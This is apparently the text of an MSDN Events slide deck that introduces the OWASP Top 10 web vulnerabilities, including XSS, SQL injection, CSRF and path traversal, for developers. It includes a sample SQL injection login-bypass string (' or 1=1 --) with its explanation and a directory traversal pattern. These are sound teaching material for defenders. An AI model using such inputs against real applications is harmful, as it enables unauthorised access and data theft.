Securing Web Applications

It’s always better live.

MSDN Events

Securing Web Applications

Part 1 of 2

Understanding Threats and Attacks

Challenges When Implementing
Security

Attacker needs to understand only one
security issue

Defender needs to secure all entry points

Attacker has unlimited time

Defender works with time and cost constraints

Attackers vs. Defenders

Developers and management think that
security does not add any business value

Addressing security issues just before a
product is released is very expensive

Security As an
Afterthought

Security?

Secure systems are more difficult to use

Complex and strong passwords are difficult to
remember

Users prefer simple passwords

Security vs. Usability

Agenda

A Closer look at Top Web Vulnerabilities:

Cross Site Scripting

Injection Flaws

Malicious File Execution

Insecure Direct Object Reference

Cross Site Request Forgery (CSRF)

Information Leakage and Improper Error Handling

Broken Authentication and Session Management

Insecure Cryptography

Insecure Communications

Failure to Restrict URL Access




Open Web Application Security Project (OWASP)

http://www.owasp.org/index.php/Top_10_2007

Cross Site Scripting (XSS)

What is Cross Site Scripting

Exploit applications that echo raw, unfiltered
input to Web pages

Malicious code is echoed back into the HTML

Find a <form> field or query string parameter
whose value is echoed to the Web page and
put in malicious script and get a user to
navigate to the page

Allows attackers to execute scripts

Can hijack user sessions

Deface web sites or insert hostile content

Conduct Phishing attacks

Take over the user’s browsers


Cross Site Scripting (XSS)

Three known types of cross site scripting

Reflected

Stored

DOM Injection

Cross Site Scripting (XSS)

Reflected

A page will reflect user supplied data directly
back to the user

Occurs when a site does not filter content
before displaying it

Allows for hidden site details such as session
or authentication structure to be captured and
potentially utilized

Cross Site Scripting (XSS)

Stored / Sticky XSS

Stores hostile / non
-
approved data in a file or
a database

Sometimes assumed that stored data is
inherently safe

Internal attacks often exploit this assumption

Dangerous to Systems such as:

Content Management Systems

Blogs or forums

Sites that allow users to see input by other
users

Cross Site Scripting (XSS)

DOM based attacks

JavaScript code is manipulated

Attacks can be a blend of various attacks

Generally carried out using JavaScript

Allows hackers to manipulate the rendered
page

Manipulating the DOM tree

Can allow Form Data Hijacking

Can occur without user interaction in
complete transparency

Can utilize the XmlHttpRequest Object
(AJAX)

Can compromise checkout information


Cross Site Scripting (XSS)

Cross Site Scripting Demo

Discovery using Reflected Method

Using Stored or Sticky Method

Non
-
Persistent Attack via Email

Cross Site Request Forgery

Simple and Potentially Devastating

Forces a logged
-
on victim’s browser to send
a request to a vulnerable web application

Then performs an action on behalf of the
victim

Occurs when authorization is performed
solely on automatically submitted credentials
such as:

Session cookies

Basic authorization credentials

Source IP Addresses

SSL Certificates

Windows domain credentials

Cross Site Request Forgery

Cross Site Request Forgery

Cross Site Request Forgery Demo

Injection Flaws

SQL Injection flaws are common
vulnerabilities

Occurs when external input is used in
database commands

The supplied data changes the command being
executed

Can allow attackers to create, read, update or
delete data.

Can potentially compromise an entire
application

Injection Flaws

Example exploit:

SELECT COUNT(*)


FROM Users


WHERE User = ‘User’ AND Password = ‘Password’


The query relies on user submitted
information to perform the query

Malicious code can be submitted such as

Where input could be ‘or 1 = 1
--

‘ closes preceding string in SQL statement

or 1=1 matches every record in the table

--

comments out the remainder of the SQL statement

Injection Flaws

SQL Injection Flaw Demos

Adding an Admin Account

Compromising Database Table
Structure and Data

Defacing a Website



Injection Flaws

Not limited to SQL Injection only

LDAP, XPATH, XXI, MX(Mail)

HTML Injection (XSS)

HTTP Injection (HTTP Response Splitting)

Malicious File Execution

Occurs when the application is tricked into
executing commands or creating files on
the server

System allows potentially hostile input to be
utilized with file or stream functions such as
URLS or file system references

Can lead to arbitrary remote and hostile
content being included or invoked by server

Allows for remote code execution

Remote root installations or system compromises

Insecure Direct Object Reference

Occurs when an internal implementation
object is exposed such as a:

File

Directory

Database Record or Key

URL

Form Parameter


These can be manipulated if no access
control check is in place

Insecure Direct Object Reference

Applications expose internal objects to
users

Parameter Tampering allow references
to be changed

Can violate the intended but unenforced
access control policy

Any exposed application construct could be
vulnerable

Code can be attacked when user input is
determining location of Object

Using input parameters such as:

../../…/
-

can allow an attacker to traverse the file system


Insecure Direct Object Reference

Insecure Direct Object Reference
Demo

Accessing Source Code

Accessing Sensitive Information

Information Leakage and Improper Error
Handling

Applications can unintentionally leak
information about their configuration or
internal workings

They can leak state information

Improper error handling exposes internal
workings and implementation details

Stack traces

Failed SQL statements

Other debugging information

This Information can help a hacker
successfully exploit other vulnerabilities

This is an extremely common error and can occur if
the
web.config

file is not properly configured

Information Leakage and Improper Error
Handling

Information Leakage and

Improper Error Handling DEMO

Too Much Info on Login Attempts

Too Much Error Information

Broken Authentication and Session
Management

Improper authentication and session
management

Use of pseudo random session values

Failing to protect credentials and session
tokens after login

Can lead to hijacking of user or admin
accounts

Undermine authorization and accountability
controls

Can cause privacy violations


Broken Authentication and Session
Management

Generally ancillary functions cause
problems such as:

Logout

Password Management

Timeout

Remember me

Secret question

Account update


Broken Authentication and Session
Management

Broken Authentication and

Session Management Demo

Displaying Others Profile
Information

Insecure Cryptographic Storage

Correct use of data encryption tools is key
to protection

Flaws can lead to disclosure of sensitive
data and compliance violations

Some of the most common flaws include:

Not encrypting sensitive data

Insecure use of strong algorithms

Usage of weak / homegrown algorithms
A.K.A. “
encraption
”

Hard coding keys or not protecting them

Insecure Communications

Unencrypted traffic can be sniffed

Can access conversation

Potentially expose sensitive information or
credentials


Could risk exposing authentication or
session token

Traffic sniffers can access credentials or
sensitive information

Varies by network

Not using SSL for each authenticated request


Failure to Restrict URL Access

Generally URL protection is based on
authentication

Pages can still be accessed if not
secured properly

Security by obscurity is not sufficient

•
Hidden URLS that are only available to certain
users can be stumbled upon or discovered

Client side privilege authentication

Failure to Restrict URL Access

Failure to Restrict URL Access
Demo

Security by Obscurity